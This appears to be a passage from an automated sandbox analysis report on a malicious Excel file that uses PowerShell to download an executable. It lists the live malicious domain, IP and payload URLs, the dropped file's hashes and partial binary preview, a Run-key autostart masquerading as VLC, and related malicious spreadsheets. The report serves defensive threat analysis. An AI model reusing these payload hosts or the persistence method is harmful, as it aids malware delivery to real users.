          http://en.wikip0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/I7s0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          sparepartiran.com
          		162.223.88.131
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sparepartiran.com/js/2Q/5901777.pdf.exetrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.fontbureau.com/designersGoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
            		high
            http://www.fontbureau.com/designers/?oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
              		high
              http://www.founder.com.cn/cn/bTheoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://sparepartiran.com/js/2Q/5powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designers?oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                		high
                http://www.fonts.comatoftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.tiro.comexplorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designersexplorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/Ooftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmpfalse
                    		high
                    http://sparepartiran.compowershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.goodfont.co.kroftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnpoftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sakkal.comooftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designersG6oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      		high
                      http://www.ascendercorp.com/typedesigners.html:oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.urwpp.deocSoftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.coma77oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.comldvaoftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comRoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleaseoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnn-uoftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fonts.comoftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          		high
                          http://www.sandoll.co.kroftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleaseoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comcoftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.zhongyicts.com.cnoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmpfalse
                            		high
                            http://www.sakkal.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deXoftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmljoftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comeguoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://sparepartiran.com/js/2Q/5901777.pdf.exe0yROpowershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://en.wikipoftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/I7softmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.founder.com.cn/cn/oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cnoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            		high
                                            http://sparepartiran.com/js/2Q/5901777.pdf.exeerspowershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://sparepartiran.cpowershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.monotype.oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/Kurst7Doftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                              		high
                                              http://sparepartiran.comxpowershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/S7oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.223.88.131
                                              		unknownUnited States
                                              		19084COLOUPUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:323692
                                              Start date:27.11.2020
                                              Start time:11:35:45
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 13m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:5901777.xls
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Run name:Potential for more IOCs and behavior
                                              Number of analysed new started processes analysed:33
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winXLS@16/12@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 3.9% (good quality ratio 3.8%)
                                              • Quality average: 78.1%
                                              • Quality standard deviation: 26%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xls
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.147.198.201, 52.109.76.68, 52.109.8.24, 51.11.168.160, 104.42.151.234, 95.101.184.67, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:38:01API Interceptor367x Sleep call for process: splwow64.exe modified
                                              11:38:06API Interceptor77x Sleep call for process: powershell.exe modified
                                              11:38:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
                                              11:38:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vlc "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              162.223.88.131Hm0L8.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Mvyfnzkjh1.exe
                                              5080132.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/1Q/Lfswmnuywzkn9.exe
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Yvvtz1.exe
                                              633307.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Wzdgpx2.exe
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Twvaedwzfyck1.exe
                                              4640578.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/2Q/Bolgkwpzwqs8.exe
                                              6021557.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/8YAOuE8zfTpo1M9.exe
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/IT4l74TKgSA7p92.exe
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/SDJ-0488.exe
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/d1/411.exe
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/11056.jpg
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/SD-1061.jpg
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • sparepartiran.com/js/s0/zz1ecco.jpg

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              sparepartiran.comHm0L8.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              5080132.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              633307.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              4640578.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              6021557.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              COLOUPUSHm0L8.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              5080132.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Ref 0047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              633307.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SecuriteInfo.com.Exploit.Siggen3.1570.13842.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              4640578.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              6021557.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              INQUIRY ON PRICE LIST.xlsmGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              ORDER-45103.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              yp7kw0211047.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              Debt Statement.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              SD-1061.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131
                                              NEW ORDER.xlsGet hashmaliciousBrowse
                                              • 162.223.88.131

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\Public\oftmhayq.exe
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oftmhayq.exe.log
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):5.344111348947579
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4W:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                              MD5:E87C60A24438CC611338EA5ACB433A0A
                                              SHA1:E0C6A7D5CFE32BB2178E71DEE79971A51697B7DD
                                              SHA-256:80DAB47D7A9E233A692D10ACAF5793E34911836D36DB2E11BB7C5D42DE39782A
                                              SHA-512:3DBD6773153DC9D05558ED491A92C9B4B72D594263D7BD2D06BDDCF09BE55477D35041145219A5E9A46B38575E5B60DA91C6870B2CA29A83388695AD389B8EBF
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
